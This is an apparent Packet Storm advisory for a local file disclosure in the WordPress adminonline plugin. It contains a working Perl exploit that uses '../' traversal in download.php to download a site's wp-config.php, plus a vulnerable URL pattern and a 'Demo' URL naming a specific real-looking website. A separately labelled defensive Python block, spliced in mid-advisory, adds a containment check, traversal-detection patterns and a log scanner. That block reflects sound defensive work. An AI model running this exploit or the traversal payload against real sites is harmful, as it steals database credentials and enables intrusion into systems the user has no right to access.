WordPress AdminOnline Local File Disclosure

2014-06-11T00:00:00
ID PACKETSTORM:127046
Type packetstorm
Reporter Medrik
Modified 2014-06-11T00:00:00

Description

(ASCII-art banner reading "GHB")
  
Grey Hat Boy  
  
  
[+] Title : Wordpress adminonline Plugin Local File Download  
[+] Discovered By : Medrik  
[+] CMS Home-Page : http://wordpress.org  
[+] Found Date : 2014-06-11  
[+] Tested On : Windows  
  
###################################  
  
This vulnerability lets a remote user download files from the target's local filesystem.

The local file disclosure (LFD) vulnerability is in:

File : download.php
Parameter : file
  
########[ Simple Perl Poc ]########  
  
use strict;
use warnings;
use LWP::Simple;

my $target   = 'your target here';   # base URL of the site, no trailing slash
my $confPath = '/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php';
my $req = get($target . $confPath);  # undef on HTTP error, so check before matching
if (defined $req && $req =~ /package WordPress/) {
    print "\n Downloading Config ...";
    open(my $fh, '>', 'wp-config.txt') or die "Cannot write wp-config.txt: $!";
    print $fh $req;
    close $fh;
    print "\n $target Config Downloaded To File : wp-config.txt !\n";
}
  
########[ End Perl Code ]########  
  
Vulnerable URL :
  
http://Vulnerable_Host/wp-content/plugins/adminonline/product/download.php?file=[LFD]  
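As an added, defensive example that is not part of this advisory and not the plugin's own code: download.php itself is not reproduced on this page, so the Python below reimplements the containment check such a download handler needs (resolve the requested name under the product directory and refuse anything that escapes it), and scans web-server access log lines for requests to the endpoint above whose file parameter carries a traversal sequence. The directory layout, the log lines, the file names and the helper names are all constructed for the example.

```python
"""Added example (not from the advisory): two defensive checks for the
download.php?file= local file disclosure described above.

safe_download_path()     - the containment check a download handler should do
find_traversal_requests() - detection of exploitation attempts in access logs
"""
import os
import re
import tempfile
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint named in the advisory; everything else is constructed.
ENDPOINT = "/wp-content/plugins/adminonline/product/download.php"

# Plain and percent-encoded "../" (and "..\") forms, case-insensitive.
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|%2e%2e%2f|%2e%2e/|\.\.%2f)", re.IGNORECASE)


def safe_download_path(base_dir: str, requested: str) -> Optional[str]:
    """Return the absolute path of `requested` inside `base_dir`, or None if
    the name is empty, absolute, or resolves outside the directory."""
    if not requested:
        return None
    decoded = unquote(requested)
    # Refuse absolute paths (POSIX and Windows drive letters) up front.
    if decoded.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", decoded):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded))
    # commonpath is the robust containment test: a plain string-prefix check
    # would wrongly accept "/srv/product-evil" as being under "/srv/product".
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def find_traversal_requests(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (path, file_value) for every request to ENDPOINT whose `file`
    parameter contains a traversal sequence or an absolute path."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if parts.path != ENDPOINT:
            continue
        # parse_qs percent-decodes once, so "..%2F" arrives here as "../".
        for value in parse_qs(parts.query).get("file", []):
            if TRAVERSAL_RE.search(value) or value.startswith("/"):
                hits.append((parts.path, value))
    return hits


# Constructed access-log lines: one legitimate download, two traversal
# attempts (plain and percent-encoded), and one request to another script.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Jun/2014:10:00:01 +0000] "GET /wp-content/plugins/adminonline/product/download.php?file=brochure.pdf HTTP/1.1" 200 5120',
    '203.0.113.7 - - [11/Jun/2014:10:00:05 +0000] "GET /wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php HTTP/1.1" 200 3090',
    '203.0.113.9 - - [11/Jun/2014:10:00:09 +0000] "GET /wp-content/plugins/adminonline/product/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3090',
    '198.51.100.2 - - [11/Jun/2014:10:01:00 +0000] "GET /index.php?p=../../etc/passwd HTTP/1.1" 404 210',
]


def demo_path_check() -> dict:
    """Build a constructed site layout in a temp dir and exercise the check."""
    with tempfile.TemporaryDirectory() as root:
        product = os.path.join(root, "wp-content", "plugins", "adminonline", "product")
        os.makedirs(product)
        with open(os.path.join(product, "brochure.pdf"), "w") as fh:
            fh.write("pdf")
        with open(os.path.join(root, "wp-config.php"), "w") as fh:
            fh.write("<?php // constructed stand-in for the real config\n")
        return {
            "legit": safe_download_path(product, "brochure.pdf") is not None,
            "traversal": safe_download_path(product, "../../../../wp-config.php"),
            "encoded": safe_download_path(product, "..%2F..%2F..%2F..%2Fwp-config.php"),
            "absolute": safe_download_path(product, "/etc/passwd"),
        }


if __name__ == "__main__":
    print(demo_path_check())
    for path, value in find_traversal_requests(SAMPLE_LOG):
        print("traversal attempt:", path, "file=", value)
```

The log scan matches only the exact endpoint path, so a real deployment would widen it to any download handler that takes a file name; the containment check is the part worth porting back into the plugin's own language.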
  
Demo :  
  
http://www.cocl.ca/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php  
  
  
Gr33tz : Beni_Vanda , Black_KinG , M.R.S.CO , Dr.3v1l , 8ThBiT , Enddo ,   
Explo!ter , YoSeF__HaCkeR , Moji_RideR , E2MA3N - S!Y0U.T4r.6T - 0x0ptim0us - ARTA And All My Friends .  